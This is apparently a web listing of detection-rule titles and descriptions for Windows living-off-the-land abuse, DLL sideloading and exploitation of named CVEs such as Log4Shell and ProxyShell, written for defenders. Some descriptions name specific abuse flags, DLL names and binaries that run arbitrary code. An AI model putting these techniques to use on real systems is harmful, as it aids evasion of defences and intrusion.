  • Uncommon Link.EXE Parent Process - Level: medium
    Description: Detects an uncommon parent process of "LINK.EXE". Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation. Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity. This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location. By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
  • Devtoolslauncher.exe Executes Specified Binary - Level: high
    Description: The Devtoolslauncher.exe executes other binary
  • DeviceCredentialDeployment Execution - Level: medium
    Description: Detects the execution of DeviceCredentialDeployment to hide a process from view
  • Gpscript Execution - Level: medium
    Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
  • Ie4uinit Lolbin Use From Invalid Path - Level: medium
    Description: Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories
  • MpiExec Lolbin - Level: high
    Description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary
  • Execute Files with Msdeploy.exe - Level: medium
    Description: Detects file execution using the msdeploy.exe lolbin
  • Execute MSDT Via Answer File - Level: high
    Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)
  • OpenWith.exe Executes Specified Binary - Level: high
    Description: The OpenWith.exe executes other binary
  • Indirect Command Execution By Program Compatibility Wizard - Level: low
    Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
  • Execute Pcwrun.EXE To Leverage Follina - Level: high
    Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
  • DLL Execution via Rasautou.exe - Level: medium
    Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
  • REGISTER_APP.VBS Proxy Execution - Level: medium
    Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
  • Lolbin Runexehelper Use As Proxy - Level: medium
    Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
  • Use of Scriptrunner.exe - Level: medium
    Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
  • Use Of The SFTP.EXE Binary As A LOLBIN - Level: medium
    Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
  • SyncAppvPublishingServer Execute Arbitrary PowerShell Code - Level: medium
    Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
  • SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code - Level: medium
    Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
  • Time Travel Debugging Utility Usage - Level: high
    Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
  • Lolbin Unregmp2.exe Use As Proxy - Level: medium
    Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
  • Use of VisualUiaVerifyNative.exe - Level: medium
    Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
  • Potential Register_App.Vbs LOLScript Abuse - Level: medium
    Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
  • Potential Suspicious Mofcomp Execution - Level: high
    Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts
  • File Download Via Windows Defender MpCmpRun.EXE - Level: high
    Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
  • Arbitrary File Download Via MSEDGE_PROXY.EXE - Level: medium
    Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
  • Suspicious MSDT Parent Process - Level: high
    Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
  • Arbitrary File Download Via MSOHTMED.EXE - Level: medium
    Description: Detects usage of "MSOHTMED" to download arbitrary files
  • Arbitrary File Download Via MSPUB.EXE - Level: medium
    Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
  • Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution - Level: medium
    Description: Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory.
  • RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses - Level: high
    Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
  • Arbitrary File Download Via PresentationHost.EXE - Level: medium
    Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
  • XBAP Execution From Uncommon Locations Via PresentationHost.EXE - Level: medium
    Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
  • Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution - Level: medium
    Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
  • Abusing Print Executable - Level: medium
    Description: Attackers can use print.exe for remote file copy
  • File Download Using ProtocolHandler.exe - Level: medium
    Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
  • Suspicious Provlaunch.EXE Child Process - Level: high
    Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
  • Potential Provlaunch.EXE Binary Proxy Execution Abuse - Level: medium
    Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution - Level: high
    Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
  • Renamed ZOHO Dctask64 Execution - Level: high
    Description: Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
  • Renamed MegaSync Execution - Level: high
    Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
  • Visual Studio NodejsTools PressAnyKey Renamed Execution - Level: medium
    Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
  • Sdiagnhost Calling Suspicious Child Process - Level: high
    Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
  • Uncommon Child Process Of Setres.EXE - Level: high
    Description: Detects uncommon child process of Setres.EXE. Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
  • Arbitrary File Download Via Squirrel.EXE - Level: medium
    Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
  • Process Proxy Execution Via Squirrel.EXE - Level: medium
    Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
  • Program Executed Using Proxy/Local Command Via SSH.EXE - Level: medium
    Description: Detect usage of the "ssh.exe" binary as a proxy to launch other programs.
  • Execution via stordiag.exe - Level: high
    Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
  • Potential File Download Via MS-AppInstaller Protocol Handler - Level: medium
    Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
  • Windows Shell/Scripting Processes Spawning Suspicious Programs - Level: high
    Description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
  • Malicious Windows Script Components File Execution by TAEF Detection - Level: low
    Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
  • Malicious PE Execution by Microsoft Visual Studio Debugger - Level: medium
    Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package.
  • Execution via WorkFolders.exe - Level: high
    Description: Detects using WorkFolders.exe to execute an arbitrary control.exe
  • Potential Binary Impersonating Sysinternals Tools - Level: medium
    Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection
  • Verclsid.exe Runs COM Object - Level: medium
    Description: Detects when verclsid.exe is used to run COM object via GUID
  • Potentially Suspicious Child Process Of VsCode - Level: medium
    Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
  • Potential Binary Proxy Execution Via VSDiagnostics.EXE - Level: medium
    Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
  • Suspicious Vsls-Agent Command With AgentExtensionPath Load - Level: medium
    Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
  • Wlrmdr.EXE Uncommon Argument Or Child Process - Level: medium
    Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
  • WSL Child Process Anomaly - Level: medium
    Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
  • Proxy Execution Via Wuauclt.EXE - Level: high
    Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
  • COM Object Execution via Xwizard.EXE - Level: medium
    Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. This utility can be abused in order to run custom COM object created in the registry.
  • Atbroker Registry Change - Level: medium
    Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG - Level: high
    Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
  • Execution DLL of Choice Using WAB.EXE - Level: high
    Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
  • Potential Devil Bait Malware Reconnaissance - Level: high
    Description: Detects specific process behavior observed with Devil Bait samples
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE - Level: medium
    Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
  • Potential Compromised 3CXDesktopApp Execution - Level: high
    Description: Detects execution of known compromised version of 3CXDesktopApp
  • Potential Suspicious Child Process Of 3CXDesktopApp - Level: high
    Description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
  • Potential Compromised 3CXDesktopApp Update Activity - Level: high
    Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
  • Dllhost.EXE Initiated Network Connection To Non-Local IP Address - Level: medium
    Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
  • Diskshadow Child Process Spawned - Level: medium
    Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
  • Diskshadow Script Mode Execution - Level: medium
    Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
  • Potential Proxy Execution Via Explorer.EXE From Shell Process - Level: low
    Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe". Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. While this is often a legitimate action, this rule can be use to hunt for anomalies. Muddy Waters threat actor was seeing using this technique.
  • Potential DLL Sideloading Activity Via ExtExport.EXE - Level: medium
    Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". Arbitrary DLLs can also be loaded if a specific number of flags was provided.
  • New Self Extracting Package Created Via IExpress.EXE - Level: medium
    Description: Detects the "iexpress.exe" utility creating self-extracting packages. Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
  • Microsoft Workflow Compiler Execution - Level: medium
    Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
  • Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly - Level: medium
    Description: Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'.
  • Rundll32.EXE Calling DllRegisterServer Export Function Explicitly - Level: medium
    Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
  • Arbitrary Command Execution Using WSL - Level: medium
    Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.
attack.t1190 130
Show Rules (130)
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
  • Django Framework Exceptions - Level: medium
    Description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts
  • Potential JNDI Injection Exploitation In JVM Based Application - Level: high
    Description: Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.
  • Potential Local File Read Vulnerability In JVM Based Application - Level: high
    Description: Detects potential local file read vulnerability in JVM based apps. If the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.
  • Potential OGNL Injection Exploitation In JVM Based Application - Level: high
    Description: Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)
  • Process Execution Error In JVM Based Application - Level: high
    Description: Detects process execution related exceptions in JVM based apps, often relates to RCE
  • Potential XXE Exploitation Attempt In JVM Based Application - Level: high
    Description: Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely.
  • Potential RCE Exploitation Attempt In NodeJS - Level: high
    Description: Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.
  • OpenCanary - FTP Login Attempt - Level: high
    Description: Detects instances where an FTP service on an OpenCanary node has had a login attempt.
  • OpenCanary - HTTP GET Request - Level: high
    Description: Detects instances where an HTTP service on an OpenCanary node has received a GET request.
  • OpenCanary - HTTP POST Login Attempt - Level: high
    Description: Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.
  • Python SQL Exceptions - Level: medium
    Description: Generic rule for SQL exceptions in Python according to PEP 249
  • Ruby on Rails Framework Exceptions - Level: medium
    Description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
  • Spring Framework Exceptions - Level: medium
    Description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts
  • Potential SpEL Injection In Spring Framework - Level: high
    Description: Detects potential SpEL Injection exploitation, which may lead to RCE.
  • Suspicious SQL Error Messages - Level: high
    Description: Detects SQL error messages that indicate probing for an injection attack
  • Potential Server Side Template Injection In Velocity - Level: high
    Description: Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE.
  • Suspicious SQL Query - Level: medium
    Description: Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields
  • New Network ACL Entry Added - Level: low
    Description: Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.
  • New Network Route Added - Level: medium
    Description: Detects the addition of a new network route to a route table in AWS.
  • Ingress/Egress Security Group Modification - Level: medium
    Description: Detects when an account makes changes to the ingress or egress rules of a security group. This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.
  • LoadBalancer Security Group Modification - Level: medium
    Description: Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.
  • RDS Database Security Group Modification - Level: medium
    Description: Detects changes to the security group entries for RDS databases. This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.
  • Suspicious OpenSSH Daemon Error - Level: medium
    Description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
  • Suspicious Named Error - Level: high
    Description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
  • Suspicious VSFTPD Error Messages - Level: medium
    Description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
  • Atlassian Confluence CVE-2022-26134 - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
  • Apache Spark Shell Command Injection - ProcessCreation - Level: high
    Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • DNS Query to External Service Interaction Domains - Level: high
    Description: Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
  • OMIGOD HTTP No Authentication RCE - Level: high
    Description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
  • Apache Threading Error - Level: medium
    Description: Detects an issue in apache logs that reports threading related errors
  • F5 BIG-IP iControl Rest API Command Execution - Proxy - Level: medium
    Description: Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
  • Hack Tool User Agent - Level: high
    Description: Detects suspicious user agent strings user by hack tools in proxy logs
  • F5 BIG-IP iControl Rest API Command Execution - Webserver - Level: medium
    Description: Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
  • Successful IIS Shortname Fuzzing Scan - Level: medium
    Description: When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol "~"
  • Java Payload Strings - Level: high
    Description: Detects possible Java payloads in web access logs
  • JNDIExploit Pattern - Level: high
    Description: Detects exploitation attempt using the JNDI-Exploit-Kit
  • Path Traversal Exploitation Attempts - Level: medium
    Description: Detects path traversal exploitation attempts
  • SQL Injection Strings In URI - Level: high
    Description: Detects potential SQL injection attempts via GET requests in access logs.
  • Suspicious User-Agents Related To Recon Tools - Level: medium
    Description: Detects known suspicious (default) user-agents related to scanning/recon tools
  • Failed Logon From Public IP - Level: medium
    Description: Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
  • Suspicious File Drop by Exchange - Level: medium
    Description: Detects suspicious file type dropped by an Exchange component in IIS
  • Suspicious MSExchangeMailboxReplication ASPX Write - Level: high
    Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
  • Suspicious Child Process Of SQL Server - Level: high
    Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
  • Remote Access Tool - ScreenConnect Server Web Shell Execution - Level: high
    Description: Detects potential web shell execution from the ScreenConnect server process.
  • Terminal Service Process Spawn - Level: high
    Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
  • Suspicious Process By Web Server Process - Level: high
    Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
  • Suspicious Processes Spawned by WinRM - Level: high
    Description: Detects suspicious processes including shells spawnd from WinRM host process
  • Rejetto HTTP File Server RCE - Level: high
    Description: Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287
  • CVE-2010-5278 Exploitation Attempt - Level: critical
    Description: MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
  • Fortinet CVE-2018-13379 Exploitation - Level: critical
    Description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
  • Oracle WebLogic Exploit - Level: critical
    Description: Detects access to a webshell dropped into a keystore folder on the WebLogic server
  • Pulse Secure Attack CVE-2019-11510 - Level: critical
    Description: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole
  • Citrix Netscaler Attack CVE-2019-19781 - Level: critical
    Description: Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack
  • Confluence Exploitation CVE-2019-3398 - Level: critical
    Description: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398
  • CVE-2020-0688 Exploitation Attempt - Level: high
    Description: Detects CVE-2020-0688 Exploitation attempts
  • CVE-2020-0688 Exchange Exploitation via Web Log - Level: critical
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
  • CVE-2020-0688 Exploitation via Eventlog - Level: high
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass - Level: critical
    Description: Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts
  • DNS RCE CVE-2020-1350 - Level: critical
    Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt - Level: critical
    Description: Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 - Level: critical
    Description: Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
  • TerraMaster TOS CVE-2020-28188 - Level: high
    Description: Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188
  • Cisco ASA FTD Exploit CVE-2020-3452 - Level: high
    Description: Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)
  • Oracle WebLogic Exploit CVE-2020-14882 - Level: high
    Description: Detects exploitation attempts on WebLogic servers
  • Arcadyan Router Exploitations - Level: critical
    Description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
  • Oracle WebLogic Exploit CVE-2021-2109 - Level: critical
    Description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
  • CVE-2021-21972 VSphere Exploitation - Level: high
    Description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972
  • CVE-2021-21978 Exploitation Attempt - Level: high
    Description: Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978
  • VMware vCenter Server File Upload CVE-2021-22005 - Level: high
    Description: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.
  • Fortinet CVE-2021-22123 Exploitation - Level: critical
    Description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
  • Pulse Connect Secure RCE Attack CVE-2021-22893 - Level: high
    Description: This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
  • Potential CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection
  • Exploitation of CVE-2021-26814 in Wazuh - Level: high
    Description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
  • ProxyLogon Reset Virtual Directories Based On IIS Log - Level: critical
    Description: When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories
  • Potential CVE-2021-27905 Exploitation Attempt - Level: medium
    Description: Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.
  • Exchange Exploitation CVE-2021-28480 - Level: critical
    Description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480
  • CVE-2021-33766 Exchange ProxyToken Exploitation - Level: critical
    Description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766
  • ADSelfService Exploitation - Level: high
    Description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit - Level: critical
    Description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
  • LPE InstallerFileTakeOver PoC CVE-2021-41379 - Level: high
    Description: Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379
  • CVE-2021-41773 Exploitation Attempt - Level: high
    Description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
  • Sitecore Pre-Auth RCE CVE-2021-42237 - Level: high
    Description: Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx
  • Grafana Path Traversal Exploitation CVE-2021-43798 - Level: critical
    Description: Detects a successful Grafana path traversal exploitation
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon - Level: high
    Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
  • Log4j RCE CVE-2021-44228 Generic - Level: high
    Description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
  • Log4j RCE CVE-2021-44228 in Fields - Level: high
    Description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
  • Exchange ProxyShell Pattern - Level: high
    Description: Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)
  • SonicWall SSL/VPN Jarrewrite Exploitation - Level: high
    Description: Detects exploitation attempts of the SonicWall Jarrewrite Exploit
  • Exchange Exploitation Used by HAFNIUM - Level: high
    Description: Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity
  • Potential CVE-2022-21587 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution - Level: medium
    Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
